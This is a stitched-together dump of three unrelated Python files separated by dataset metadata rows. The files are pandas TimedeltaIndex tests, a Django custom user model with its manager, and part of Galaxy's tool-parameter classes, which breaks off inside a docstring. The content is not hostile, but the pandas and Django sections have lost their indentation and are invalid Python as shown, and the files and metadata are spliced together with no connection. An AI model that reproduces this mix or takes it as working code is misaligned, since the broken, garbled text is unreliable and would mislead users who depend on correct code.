def test_construction_base_constructor(self):
arr = [pd.Timedelta('1 days'), pd.NaT, pd.Timedelta('3 days')]
tm.assert_index_equal(pd.Index(arr), pd.TimedeltaIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.TimedeltaIndex(np.array(arr)))
arr = [np.nan, pd.NaT, pd.Timedelta('1 days')]
tm.assert_index_equal(pd.Index(arr), pd.TimedeltaIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.TimedeltaIndex(np.array(arr)))
def test_shift(self):
# test shift for TimedeltaIndex
# GH 8083
drange = self.create_index()
result = drange.shift(1)
expected = TimedeltaIndex(['1 days 01:00:00', '2 days 01:00:00',
'3 days 01:00:00',
'4 days 01:00:00', '5 days 01:00:00'],
freq='D')
self.assert_index_equal(result, expected)
result = drange.shift(3, freq='2D 1s')
expected = TimedeltaIndex(['6 days 01:00:03', '7 days 01:00:03',
'8 days 01:00:03', '9 days 01:00:03',
'10 days 01:00:03'], freq='D')
self.assert_index_equal(result, expected)
def test_astype(self):
# GH 13149, GH 13209
idx = TimedeltaIndex([1e14, 'NaT', pd.NaT, np.NaN])
result = idx.astype(object)
expected = Index([Timedelta('1 days 03:46:40')] + [pd.NaT] * 3,
dtype=object)
tm.assert_index_equal(result, expected)
result = idx.astype(int)
expected = Int64Index([100000000000000] + [-9223372036854775808] * 3,
dtype=np.int64)
tm.assert_index_equal(result, expected)
rng = timedelta_range('1 days', periods=10)
result = rng.astype('i8')
self.assert_index_equal(result, Index(rng.asi8))
self.assert_numpy_array_equal(rng.asi8, result.values)
def test_astype_timedelta64(self):
# GH 13149, GH 13209
idx = TimedeltaIndex([1e14, 'NaT', pd.NaT, np.NaN])
result = idx.astype('timedelta64')
expected = Float64Index([1e+14] + [np.NaN] * 3, dtype='float64')
tm.assert_index_equal(result, expected)
result = idx.astype('timedelta64[ns]')
tm.assert_index_equal(result, idx)
self.assertFalse(result is idx)
result = idx.astype('timedelta64[ns]', copy=False)
tm.assert_index_equal(result, idx)
self.assertTrue(result is idx)
def test_astype_raises(self):
# GH 13149, GH 13209
idx = TimedeltaIndex([1e14, 'NaT', pd.NaT, np.NaN])
self.assertRaises(ValueError, idx.astype, float)
self.assertRaises(ValueError, idx.astype, str)
self.assertRaises(ValueError, idx.astype, 'datetime64')
self.assertRaises(ValueError, idx.astype, 'datetime64[ns]')
def test_get_loc(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
for method in [None, 'pad', 'backfill', 'nearest']:
self.assertEqual(idx.get_loc(idx[1], method), 1)
self.assertEqual(idx.get_loc(idx[1].to_pytimedelta(), method), 1)
self.assertEqual(idx.get_loc(str(idx[1]), method), 1)
self.assertEqual(
idx.get_loc(idx[1], 'pad', tolerance=pd.Timedelta(0)), 1)
self.assertEqual(
idx.get_loc(idx[1], 'pad', tolerance=np.timedelta64(0, 's')), 1)
self.assertEqual(idx.get_loc(idx[1], 'pad', tolerance=timedelta(0)), 1)
with tm.assertRaisesRegexp(ValueError, 'must be convertible'):
idx.get_loc(idx[1], method='nearest', tolerance='foo')
for method, loc in [('pad', 1), ('backfill', 2), ('nearest', 1)]:
self.assertEqual(idx.get_loc('1 day 1 hour', method), loc)
def test_get_indexer(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
tm.assert_numpy_array_equal(idx.get_indexer(idx),
np.array([0, 1, 2], dtype=np.intp))
target = pd.to_timedelta(['-1 hour', '12 hours', '1 day 1 hour'])
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
res = idx.get_indexer(target, 'nearest',
tolerance=pd.Timedelta('1 hour'))
tm.assert_numpy_array_equal(res, np.array([0, -1, 1], dtype=np.intp))
def test_numeric_compat(self):
idx = self._holder(np.arange(5, dtype='int64'))
didx = self._holder(np.arange(5, dtype='int64') ** 2)
result = idx * 1
tm.assert_index_equal(result, idx)
result = 1 * idx
tm.assert_index_equal(result, idx)
result = idx / 1
tm.assert_index_equal(result, idx)
result = idx // 1
tm.assert_index_equal(result, idx)
result = idx * np.array(5, dtype='int64')
tm.assert_index_equal(result,
self._holder(np.arange(5, dtype='int64') * 5))
result = idx * np.arange(5, dtype='int64')
tm.assert_index_equal(result, didx)
result = idx * Series(np.arange(5, dtype='int64'))
tm.assert_index_equal(result, didx)
result = idx * Series(np.arange(5, dtype='float64') + 0.1)
tm.assert_index_equal(result, self._holder(np.arange(
5, dtype='float64') * (np.arange(5, dtype='float64') + 0.1)))
# invalid
self.assertRaises(TypeError, lambda: idx * idx)
self.assertRaises(ValueError, lambda: idx * self._holder(np.arange(3)))
self.assertRaises(ValueError, lambda: idx * np.array([1, 2]))
def test_pickle_compat_construction(self):
pass
def test_ufunc_coercions(self):
# normal ops are also tested in tseries/test_timedeltas.py
idx = TimedeltaIndex(['2H', '4H', '6H', '8H', '10H'],
freq='2H', name='x')
for result in [idx * 2, np.multiply(idx, 2)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['4H', '8H', '12H', '16H', '20H'],
freq='4H', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '4H')
for result in [idx / 2, np.divide(idx, 2)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['1H', '2H', '3H', '4H', '5H'],
freq='H', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, 'H')
idx = TimedeltaIndex(['2H', '4H', '6H', '8H', '10H'],
freq='2H', name='x')
for result in [-idx, np.negative(idx)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['-2H', '-4H', '-6H', '-8H', '-10H'],
freq='-2H', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '-2H')
idx = TimedeltaIndex(['-2H', '-1H', '0H', '1H', '2H'],
freq='H', name='x')
for result in [abs(idx), np.absolute(idx)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['2H', '1H', '0H', '1H', '2H'],
freq=None, name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, None)
def test_fillna_timedelta(self):
# GH 11343
idx = pd.TimedeltaIndex(['1 day', pd.NaT, '3 day'])
exp = pd.TimedeltaIndex(['1 day', '2 day', '3 day'])
self.assert_index_equal(idx.fillna(pd.Timedelta('2 day')), exp)
exp = pd.TimedeltaIndex(['1 day', '3 hour', '3 day'])
self.assert_index_equal(idx.fillna(pd.Timedelta('3 hour')), exp)
exp = pd.Index(
[pd.Timedelta('1 day'), 'x', pd.Timedelta('3 day')], dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
def test_difference_freq(self):
# GH14323: Difference of TimedeltaIndex should not preserve frequency
index = timedelta_range("0 days", "5 days", freq="D")
other = timedelta_range("1 days", "4 days", freq="D")
expected = TimedeltaIndex(["0 days", "5 days"], freq=None)
idx_diff = index.difference(other)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
other = timedelta_range("2 days", "5 days", freq="D")
idx_diff = index.difference(other)
expected = TimedeltaIndex(["0 days", "1 days"], freq=None)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
| 42.910194 | 79 | 0.559628 |
2500be4000abaf728c758dcddcccf9ef592e409e | 2,946 | py | Python | profiles_api/models.py | apoorvpd/profile-rest-api | 0214d7379a7911f70266ae9a3e088c8b3cd99965 | ["MIT"] | null | null | null | profiles_api/models.py | apoorvpd/profile-rest-api | 0214d7379a7911f70266ae9a3e088c8b3cd99965 | ["MIT"] | null | null | null | profiles_api/models.py | apoorvpd/profile-rest-api | 0214d7379a7911f70266ae9a3e088c8b3cd99965 | ["MIT"] | null | null | null |
from django.db import models
# These are the standard base classes that you need to use when overriding or customizing the default Django user model.
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
# Create your models here.
class UserProfileManager(BaseUserManager):
"""Manager for user profiles"""
def create_user(self, email, name, password=None):
"""Create a new user profile"""
if not email:
raise ValueError('User must have an email address')
email = self.normalize_email(email)
user = self.model(email=email, name=name)
user.set_password(password) # password is encrypted
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
"""Create and save a new superuser with given details"""
user = self.create_user(email=email, name=name, password=password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser, PermissionsMixin):
"""Database model for users in the system"""
# Every email address in the database must be unique
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
# Field used to determine whether a user's profile is active.
# By default every profile is created as active (True), but this flag allows us to
# deactivate users if we need to at some point in the future.
is_active = models.BooleanField(default=True)
# A staff user has access to the Django admin interface.
is_staff = models.BooleanField(default=False)
# Model manager to use for the objects. This is required because we use a custom UserProfile model
# with the Django CLI: Django needs a custom model manager for the UserProfile model so that it knows
# how to create and manage users through the Django command line tools.
objects = UserProfileManager()
# When users authenticate, they provide an email address and password instead of a username and password.
USERNAME_FIELD = 'email'
# USERNAME_FIELD is required by default; any additional required fields are listed in REQUIRED_FIELDS.
REQUIRED_FIELDS = ['name']
def get_full_name(self):
"""Retrieve full name of the user"""
return self.name
def get_short_name(self):
"""Retrieve short name of the user"""
return self.name
def __str__(self):
"""Return string representation of our user"""
return self.email
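# --- Illustrative usage sketch (not part of the original file) ---------------
# Assumptions: this app is installed as 'profiles_api' and the project's
# settings.py points Django at this model with
#     AUTH_USER_MODEL = 'profiles_api.UserProfile'
# The helper below is hypothetical and is never called here; it only shows how
# the custom manager defined above is typically exercised.
def _example_create_users():
    """Hypothetical helper demonstrating UserProfileManager usage."""
    from django.contrib.auth import get_user_model

    User = get_user_model()  # resolves to UserProfile once AUTH_USER_MODEL is set
    user = User.objects.create_user(
        email='jane@example.com', name='Jane', password='changeme')
    admin = User.objects.create_superuser(
        email='root@example.com', name='Root', password='changeme')
    return user, admin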
| 40.916667 | 142 | 0.672777 |
2ae9493da80687bf3ab76bc520e48f006c3166fc | 110,898 | py | Python | lib/galaxy/tools/parameters/basic.py | nomadscientist/galaxy | 5187be208d9a33ca53359283c850b075c943ad86 | ["CC-BY-3.0"] | null | null | null | lib/galaxy/tools/parameters/basic.py | nomadscientist/galaxy | 5187be208d9a33ca53359283c850b075c943ad86 | ["CC-BY-3.0"] | null | null | null | lib/galaxy/tools/parameters/basic.py | nomadscientist/galaxy | 5187be208d9a33ca53359283c850b075c943ad86 | ["CC-BY-3.0"] | null | null | null |
"""
Basic tool parameters.
"""
import contextlib
import json
import logging
import os
import os.path
import re
from webob.compat import cgi_FieldStorage
import galaxy.model
from galaxy import util
from galaxy.tool_util.parser import get_input_source as ensure_input_source
from galaxy.util import (
dbkeys,
sanitize_param,
string_as_bool,
string_as_bool_or_none,
unicodify,
XML,
)
from galaxy.util.dictifiable import Dictifiable
from galaxy.util.expressions import ExpressionContext
from galaxy.util.rules_dsl import RuleSet
from . import (
dynamic_options,
history_query,
validation
)
from .dataset_matcher import (
get_dataset_matcher_factory,
)
from .sanitize import ToolParameterSanitizer
log = logging.getLogger(__name__)
class workflow_building_modes:
DISABLED = False
ENABLED = True
USE_HISTORY = 1
WORKFLOW_PARAMETER_REGULAR_EXPRESSION = re.compile(r'\$\{.+?\}')
class ImplicitConversionRequired(Exception):
pass
def contains_workflow_parameter(value, search=False):
if not isinstance(value, str):
return False
if search and WORKFLOW_PARAMETER_REGULAR_EXPRESSION.search(value):
return True
if not search and WORKFLOW_PARAMETER_REGULAR_EXPRESSION.match(value):
return True
return False
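# Illustrative sketch (not part of the original module): how the ${...} pattern
# above behaves with match (the default) versus search. The helper is
# hypothetical and never called; it only documents the expected return values.
def _contains_workflow_parameter_examples():
    assert contains_workflow_parameter('${reference}') is True
    # Without search=True only values that *start* with ${...} are recognised.
    assert contains_workflow_parameter('prefix ${reference}') is False
    assert contains_workflow_parameter('prefix ${reference}', search=True) is True
    # Non-string values are never treated as workflow parameters.
    assert contains_workflow_parameter(42) is False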
def is_runtime_value(value):
return isinstance(value, RuntimeValue) or (isinstance(value, dict)
and value.get("__class__") in ["RuntimeValue", "ConnectedValue"])
def is_runtime_context(trans, other_values):
if trans.workflow_building_mode:
return True
for context_value in other_values.values():
if is_runtime_value(context_value):
return True
for v in util.listify(context_value):
if isinstance(v, trans.app.model.HistoryDatasetAssociation) and \
((hasattr(v, 'state') and v.state != galaxy.model.Dataset.states.OK)
or hasattr(v, 'implicit_conversion')):
return True
return False
def parse_dynamic_options(param, input_source):
options_elem = input_source.parse_dynamic_options_elem()
if options_elem is not None:
return dynamic_options.DynamicOptions(options_elem, param)
return None
# Describe a parameter value error where there is no actual supplied
# parameter - e.g. just a specification issue.
NO_PARAMETER_VALUE = object()
@contextlib.contextmanager
def assert_throws_param_value_error(message):
exception_thrown = False
try:
yield
except ParameterValueError as e:
exception_thrown = True
assert str(e) == message
assert exception_thrown
class ParameterValueError(ValueError):
def __init__(self, message_suffix, parameter_name, parameter_value=NO_PARAMETER_VALUE, is_dynamic=None):
message = f"parameter '{parameter_name}': {message_suffix}"
super().__init__(message)
self.message_suffix = message_suffix
self.parameter_name = parameter_name
self.parameter_value = parameter_value
self.is_dynamic = is_dynamic
def to_dict(self):
as_dict = {"message": unicodify(self)}
as_dict["message_suffix"] = self.message_suffix
as_dict["parameter_name"] = self.parameter_name
if self.parameter_value is not NO_PARAMETER_VALUE:
as_dict["parameter_value"] = self.parameter_value
if self.is_dynamic is not None:
as_dict["is_dynamic"] = self.is_dynamic
return as_dict
class ToolParameter(Dictifiable):
"""
Describes a parameter accepted by a tool. This is just a simple stub at the
moment but in the future should encapsulate more complex parameters (lists
of valid choices, validation logic, ...)
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None)
>>> p = ToolParameter(None, XML('<param argument="--parameter-name" type="text" value="default" />'))
>>> assert p.name == 'parameter_name'
>>> assert sorted(p.to_dict(trans).items()) == [('argument', '--parameter-name'), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'ToolParameter'), ('name', 'parameter_name'), ('optional', False), ('refresh_on_change', False), ('type', 'text'), ('value', None)]
"""
dict_collection_visible_keys = ['name', 'argument', 'type', 'label', 'help', 'refresh_on_change']
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
self.tool = tool
self.argument = input_source.get("argument")
self.name = self.__class__.parse_name(input_source)
self.type = input_source.get("type")
self.hidden = input_source.get_bool("hidden", False)
self.refresh_on_change = input_source.get_bool("refresh_on_change", False)
self.optional = input_source.parse_optional()
self.is_dynamic = False
self.label = input_source.parse_label()
self.help = input_source.parse_help()
sanitizer_elem = input_source.parse_sanitizer_elem()
if sanitizer_elem is not None:
self.sanitizer = ToolParameterSanitizer.from_element(sanitizer_elem)
else:
self.sanitizer = None
self.validators = []
for elem in input_source.parse_validator_elems():
self.validators.append(validation.Validator.from_element(self, elem))
@property
def visible(self):
"""Return true if the parameter should be rendered on the form"""
return True
def get_label(self):
"""Return user friendly name for the parameter"""
return self.label if self.label else self.name
def from_json(self, value, trans=None, other_values=None):
"""
Convert a value from an HTML POST into the parameters preferred value
format.
"""
return value
def get_initial_value(self, trans, other_values):
"""
Return the starting value of the parameter
"""
return None
def get_required_enctype(self):
"""
If this parameter needs the form to have a specific encoding
return it, otherwise return None (indicating compatibility with
any encoding)
"""
return None
def get_dependencies(self):
"""
Return the names of any other parameters this parameter depends on
"""
return []
def to_json(self, value, app, use_security):
"""Convert a value to a string representation suitable for persisting"""
return unicodify(value)
def to_python(self, value, app):
"""Convert a value created with to_json back to an object representation"""
return value
def value_to_basic(self, value, app, use_security=False):
if is_runtime_value(value):
return runtime_to_json(value)
return self.to_json(value, app, use_security)
def value_from_basic(self, value, app, ignore_errors=False):
# Handle Runtime and Unvalidated values
if is_runtime_value(value):
if isinstance(self, HiddenToolParameter):
raise ParameterValueError(message_suffix='Runtime Parameter not valid', parameter_name=self.name)
return runtime_to_object(value)
elif isinstance(value, dict) and value.get('__class__') == 'UnvalidatedValue':
return value['value']
# Delegate to the 'to_python' method
if ignore_errors:
try:
return self.to_python(value, app)
except Exception:
return value
else:
return self.to_python(value, app)
def value_to_display_text(self, value):
if is_runtime_value(value):
return "Not available."
return self.to_text(value)
def to_text(self, value):
"""
Convert a value to a text representation suitable for displaying to
the user
>>> p = ToolParameter(None, XML('<param name="_name" />'))
>>> print(p.to_text(None))
Not available.
>>> print(p.to_text(''))
Empty.
>>> print(p.to_text('text'))
text
>>> print(p.to_text(True))
True
>>> print(p.to_text(False))
False
>>> print(p.to_text(0))
0
"""
if value is not None:
str_value = unicodify(value)
if not str_value:
return "Empty."
return str_value
return "Not available."
def to_param_dict_string(self, value, other_values=None):
"""Called via __str__ when used in the Cheetah template"""
if value is None:
value = ""
elif not isinstance(value, str):
value = str(value)
if self.tool is None or self.tool.options.sanitize:
if self.sanitizer:
value = self.sanitizer.sanitize_param(value)
else:
value = sanitize_param(value)
return value
def validate(self, value, trans=None):
if value in ["", None] and self.optional:
return
for validator in self.validators:
validator.validate(value, trans)
def to_dict(self, trans, other_values=None):
""" to_dict tool parameter. This can be overridden by subclasses. """
other_values = other_values or {}
tool_dict = super().to_dict()
tool_dict['model_class'] = self.__class__.__name__
tool_dict['optional'] = self.optional
tool_dict['hidden'] = self.hidden
tool_dict['is_dynamic'] = self.is_dynamic
tool_dict['value'] = self.value_to_basic(self.get_initial_value(trans, other_values), trans.app, use_security=True)
return tool_dict
@classmethod
def build(cls, tool, input_source):
"""Factory method to create parameter of correct type"""
input_source = ensure_input_source(input_source)
param_name = cls.parse_name(input_source)
param_type = input_source.get('type')
if not param_type:
raise ValueError(f"parameter '{param_name}' requires a 'type'")
elif param_type not in parameter_types:
raise ValueError(f"parameter '{param_name}' uses an unknown type '{param_type}'")
else:
return parameter_types[param_type](tool, input_source)
@staticmethod
def parse_name(input_source):
return input_source.parse_name()
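# Note (illustrative, not in the original source): ToolParameter.build() is the
# dispatch point used when tool XML is parsed. It looks up the 'type' attribute
# in the parameter_types registry defined later in this module, so for example
# ToolParameter.build(tool, XML('<param name="n" type="integer" value="1"/>'))
# would return an IntegerToolParameter instance.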
class SimpleTextToolParameter(ToolParameter):
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.optional = input_source.get_bool('optional', False)
if self.optional:
self.value = None
else:
self.value = ''
def to_json(self, value, app, use_security):
"""Convert a value to a string representation suitable for persisting"""
if value is None:
rval = '' if not self.optional else None
else:
rval = unicodify(value)
return rval
def get_initial_value(self, trans, other_values):
return self.value
class TextToolParameter(SimpleTextToolParameter):
"""
Parameter that can take on any text value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None)
>>> p = TextToolParameter(None, XML('<param name="_name" type="text" value="default" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('area', False), ('argument', None), ('datalist', []), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'TextToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'text'), ('value', u'default')]
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.datalist = []
for (title, value, _) in input_source.parse_static_options():
self.datalist.append({'label': title, 'value': value})
self.value = input_source.get('value')
self.area = input_source.get_bool('area', False)
def validate(self, value, trans=None):
search = self.type == "text"
if not (trans and trans.workflow_building_mode is workflow_building_modes.ENABLED and contains_workflow_parameter(value, search=search)):
return super().validate(value, trans)
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
other_values = other_values or {}
d['area'] = self.area
d['datalist'] = self.datalist
d['optional'] = self.optional
return d
class IntegerToolParameter(TextToolParameter):
"""
Parameter that takes an integer value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), workflow_building_mode=True)
>>> p = IntegerToolParameter(None, XML('<param name="_name" type="integer" value="10" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('area', False), ('argument', None), ('datalist', []), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('max', None), ('min', None), ('model_class', 'IntegerToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'integer'), ('value', u'10')]
>>> assert type(p.from_json("10", trans)) == int
>>> with assert_throws_param_value_error("parameter '_name': an integer or workflow parameter is required"):
... p.from_json("_string", trans)
"""
dict_collection_visible_keys = ToolParameter.dict_collection_visible_keys + ['min', 'max']
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
if self.value:
try:
int(self.value)
except ValueError:
raise ParameterValueError("the attribute 'value' must be an integer", self.name)
elif self.value is None and not self.optional:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, None)
self.min = input_source.get('min')
self.max = input_source.get('max')
if self.min:
try:
self.min = int(self.min)
except ValueError:
raise ParameterValueError("attribute 'min' must be an integer", self.name, self.min)
if self.max:
try:
self.max = int(self.max)
except ValueError:
raise ParameterValueError("attribute 'max' must be an integer", self.name, self.max)
if self.min is not None or self.max is not None:
self.validators.append(validation.InRangeValidator(None, self.min, self.max))
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
try:
return int(value)
except (TypeError, ValueError):
if contains_workflow_parameter(value) and trans.workflow_building_mode is workflow_building_modes.ENABLED:
return value
if not value and self.optional:
return ""
if trans.workflow_building_mode is workflow_building_modes.ENABLED:
raise ParameterValueError("an integer or workflow parameter is required", self.name, value)
else:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, value)
def to_python(self, value, app):
try:
return int(value)
except (TypeError, ValueError) as err:
if contains_workflow_parameter(value):
return value
if not value and self.optional:
return None
raise err
def get_initial_value(self, trans, other_values):
if self.value not in {None, ''}:
return int(self.value)
else:
return None
class FloatToolParameter(TextToolParameter):
"""
Parameter that takes a real number value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), workflow_building_mode=True)
>>> p = FloatToolParameter(None, XML('<param name="_name" type="float" value="3.141592" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('area', False), ('argument', None), ('datalist', []), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('max', None), ('min', None), ('model_class', 'FloatToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'float'), ('value', u'3.141592')]
>>> assert type(p.from_json("36.1", trans)) == float
>>> with assert_throws_param_value_error("parameter '_name': an integer or workflow parameter is required"):
... p.from_json("_string", trans)
"""
dict_collection_visible_keys = ToolParameter.dict_collection_visible_keys + ['min', 'max']
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
self.min = input_source.get('min')
self.max = input_source.get('max')
if self.value:
try:
float(self.value)
except ValueError:
raise ParameterValueError("the attribute 'value' must be a real number", self.name, self.value)
elif self.value is None and not self.optional:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, None)
if self.min:
try:
self.min = float(self.min)
except ValueError:
raise ParameterValueError("attribute 'min' must be a real number", self.name, self.min)
if self.max:
try:
self.max = float(self.max)
except ValueError:
raise ParameterValueError("attribute 'max' must be a real number", self.name, self.max)
if self.min is not None or self.max is not None:
self.validators.append(validation.InRangeValidator(None, self.min, self.max))
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
try:
return float(value)
except (TypeError, ValueError):
if contains_workflow_parameter(value) and trans.workflow_building_mode is workflow_building_modes.ENABLED:
return value
if not value and self.optional:
return ""
if trans.workflow_building_mode is workflow_building_modes.ENABLED:
raise ParameterValueError("an integer or workflow parameter is required", self.name, value)
else:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, value)
def to_python(self, value, app):
try:
return float(value)
except (TypeError, ValueError) as err:
if contains_workflow_parameter(value):
return value
if not value and self.optional:
return None
raise err
def get_initial_value(self, trans, other_values):
try:
return float(self.value)
except Exception:
return None
class BooleanToolParameter(ToolParameter):
"""
Parameter that takes one of two values.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = BooleanToolParameter(None, XML('<param name="_name" type="boolean" checked="yes" truevalue="_truevalue" falsevalue="_falsevalue" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('falsevalue', '_falsevalue'), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'BooleanToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('truevalue', '_truevalue'), ('type', 'boolean'), ('value', 'true')]
>>> print(p.from_json('true'))
True
>>> print(p.to_param_dict_string(True))
_truevalue
>>> print(p.from_json('false'))
False
>>> print(p.to_param_dict_string(False))
_falsevalue
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.truevalue = input_source.get('truevalue', 'true')
self.falsevalue = input_source.get('falsevalue', 'false')
nullable = input_source.get_bool('optional', False)
self.optional = nullable
self.checked = input_source.get_bool('checked', None if nullable else False)
def from_json(self, value, trans=None, other_values=None):
return self.to_python(value)
def to_python(self, value, app=None):
if not self.optional:
ret_val = string_as_bool(value)
else:
ret_val = string_as_bool_or_none(value)
return ret_val
def to_json(self, value, app, use_security):
rval = json.dumps(self.to_python(value, app))
return rval
def get_initial_value(self, trans, other_values):
return self.checked
def to_param_dict_string(self, value, other_values=None):
if self.to_python(value):
return self.truevalue
else:
return self.falsevalue
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
d['truevalue'] = self.truevalue
d['falsevalue'] = self.falsevalue
d['optional'] = self.optional
return d
@property
def legal_values(self):
return [self.truevalue, self.falsevalue]
class FileToolParameter(ToolParameter):
"""
Parameter that takes an uploaded file as a value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = FileToolParameter(None, XML('<param name="_name" type="file"/>'))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'FileToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'file'), ('value', None)]
"""
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
def from_json(self, value, trans=None, other_values=None):
# Middleware or proxies may encode files in special ways (TODO: this
# should be pluggable)
if type(value) == dict:
if 'session_id' in value:
# handle api upload
session_id = value["session_id"]
upload_store = trans.app.config.new_file_path
if re.match(r'^[\w-]+$', session_id) is None:
raise ValueError("Invalid session id format.")
local_filename = os.path.abspath(os.path.join(upload_store, session_id))
else:
# handle nginx upload
upload_store = trans.app.config.nginx_upload_store
assert upload_store, "Request appears to have been processed by nginx_upload_module but Galaxy is not configured to recognize it."
local_filename = os.path.abspath(value['path'])
assert local_filename.startswith(upload_store), f"Filename provided by nginx ({local_filename}) is not in correct directory ({upload_store})."
value = dict(filename=value["name"], local_filename=local_filename)
return value
def get_required_enctype(self):
"""
File upload elements require the multipart/form-data encoding
"""
return "multipart/form-data"
def to_json(self, value, app, use_security):
if value in [None, '']:
return None
elif isinstance(value, str):
return value
elif isinstance(value, dict):
# or should we jsonify?
try:
return value['local_filename']
except KeyError:
return None
elif isinstance(value, cgi_FieldStorage):
return value.filename
raise Exception("FileToolParameter cannot be persisted")
def to_python(self, value, app):
if value is None:
return None
elif isinstance(value, str):
return value
else:
raise Exception("FileToolParameter cannot be persisted")
class FTPFileToolParameter(ToolParameter):
"""
Parameter that takes a file uploaded via FTP as a value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), user=None)
>>> p = FTPFileToolParameter(None, XML('<param name="_name" type="ftpfile"/>'))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'FTPFileToolParameter'), ('multiple', True), ('name', '_name'), ('optional', True), ('refresh_on_change', False), ('type', 'ftpfile'), ('value', None)]
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.multiple = input_source.get_bool('multiple', True)
self.optional = input_source.parse_optional(True)
self.user_ftp_dir = ''
def get_initial_value(self, trans, other_values):
if trans is not None:
if trans.user is not None:
self.user_ftp_dir = f"{trans.user_ftp_dir}/"
return None
@property
def visible(self):
if self.tool.app.config.ftp_upload_dir is None or self.tool.app.config.ftp_upload_site is None:
return False
return True
def to_param_dict_string(self, value, other_values=None):
if value == '':
return 'None'
lst = [f'{self.user_ftp_dir}{dataset}' for dataset in value]
if self.multiple:
return lst
else:
return lst[0]
def from_json(self, value, trans=None, other_values=None):
return self.to_python(value, trans.app, validate=True)
def to_json(self, value, app, use_security):
return self.to_python(value, app)
def to_python(self, value, app, validate=False):
if not isinstance(value, list):
value = [value]
lst = []
for val in value:
if val in [None, '']:
lst = []
break
if isinstance(val, dict):
lst.append(val['name'])
else:
lst.append(val)
if len(lst) == 0:
if not self.optional and validate:
raise ValueError("Please select a valid FTP file.")
return None
if validate and self.tool.app.config.ftp_upload_dir is None:
raise ValueError("The FTP directory is not configured.")
return lst
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
d['multiple'] = self.multiple
return d
class HiddenToolParameter(ToolParameter):
"""
Parameter that is not displayed to the user and carries a fixed hidden value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = HiddenToolParameter(None, XML('<param name="_name" type="hidden" value="_value"/>'))
>>> print(p.name)
